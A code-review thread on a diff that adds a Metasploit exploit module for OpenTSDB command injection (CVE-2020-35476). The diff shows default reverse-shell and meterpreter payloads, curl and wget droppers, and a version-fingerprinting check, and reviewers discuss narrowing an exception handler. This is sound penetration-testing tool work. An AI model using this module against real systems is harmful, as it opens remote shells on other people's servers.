modules/exploits/linux/http/opentsdb_yrange_cmd_injection.rb

```diff
@@ -0,0 +1,242 @@
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          ['CVE', '2020-35476'],
+          ['URL', 'https://github.com/OpenTSDB/opentsdb/issues/2051'] # disclosure and PoC
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 4242
+        },
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'CmdStagerFlavor' => %w[bourne curl wget],
+        'Targets' => [
+          [
+            'Automatic (Unix In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            }
+          ],
+          [
+            'Automatic (Linux Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-11-18',
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),
+    ]
+  end
+
+  def check
+    # sanity check to see if the target is likely OpenTSDB
+    res1 = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    unless res1
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res1.code == 200 && res1.body.include?('<title>OpenTSDB</title>')
+      return CheckCode::Safe('Target is not an OpenTSDB application.')
+    end
+
+    # get the version via the api
+    res2 = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'version')
+    })
+
+    unless res2
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res2.code == 200 && res2.body.include?('version')
+      return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')
+    end
+
+    begin
+      version = JSON.parse(res2.body)['version']
+    rescue JSON::ParserError
+      return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')
+    end
+
+    begin
+      if Rex::Version.new(version) <= Rex::Version.new('2.4.0')
+        return CheckCode::Appears("The target is OpenTSDB version #{version}")
+      else
+        return CheckCode::Safe("The target is OpenTSDB version #{version}")
+      end
+    rescue StandardError => e
+      return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")
+    end
```

Comment:
Is this needed? 👀

Reply:
@adfoster-r7 I thought so because `Rex::Version` doesn't allow a whole lot of different formats so if they come out with a version format that isn't supported, the module could break on the `Rex::Version.new` call:
```
>> Rex::Version.new('v1.2')
/home/wynter/.rbenv/versions/3.0.2/lib/ruby/3.0.0/rubygems/version.rb:214:in `initialize': Malformed version number string v1.2 (ArgumentError)
        from /home/wynter/dev/metasploit-framework/lib/rex/version.rb:10:in `initialize'
        from /home/wynter/.rbenv/versions/3.0.2/lib/ruby/3.0.0/rubygems/version.rb:203:in `new'
        from /home/wynter/.rbenv/versions/3.0.2/lib/ruby/3.0.0/rubygems/version.rb:203:in `new'
        from (irb):6:in `<main>'
```

Reply:
It makes sense. You can also add some logic before to make sure the version has the proper format and return in case it is not. If you prefer using an exception handler like this, it is also fine, but, I suggest to avoid "catch-all" exception handlers like `StandardError`. Prefer more specific exceptions, `ArgumentError` in this case.
```suggestion
    rescue ArgumentError => e
      return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")
    end
```

Reply:
@cdelafuente-r7 I'm hesitant to perform logic to check the version format because I don't know what version formats they've been using previously. But I agree with our suggestion about specifying  `ArgumentError` so I've added  that now.  thanks!